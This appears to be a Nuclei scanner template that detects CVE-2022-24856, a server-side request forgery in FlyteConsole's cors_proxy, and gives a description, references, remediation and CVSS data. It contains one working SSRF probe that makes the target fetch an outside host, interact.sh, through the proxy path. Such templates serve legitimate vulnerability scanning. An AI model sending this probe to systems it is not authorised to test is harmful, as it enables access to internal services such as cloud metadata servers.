nuclei-templates/cves/2022/CVE-2022-24856.yaml

34 lines
1.4 KiB
YAML
Raw Normal View History

id: CVE-2022-24856
info:
name: Flyte Console <0.52.0 - Server-Side Request Forgery
author: pdteam
severity: high
description: |
2022-06-30 17:59:37 +00:00
FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur.
reference:
- https://github.com/flyteorg/flyteconsole/security/advisories/GHSA-www6-hf2v-v9m9
- https://github.com/flyteorg/flyteconsole/pull/389
- https://hackerone.com/reports/1540906
- https://nvd.nist.gov/vuln/detail/CVE-2022-24856
remediation: |
The patch for this issue deletes the entire cors_proxy, as this is no longer required for the console. A patch is available in FlyteConsole version 0.52.0, or as a work-around disable FlyteConsole.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-24856
cwe-id: CWE-918
tags: cve,cve2022,flyteconsole,ssrf,oss,hackerone
requests:
- method: GET
path:
- "{{BaseURL}}/cors_proxy/https://www.interact.sh"
matchers:
- type: word
words:
- "Interactsh Server"
# Enhanced by mp on 2022/06/29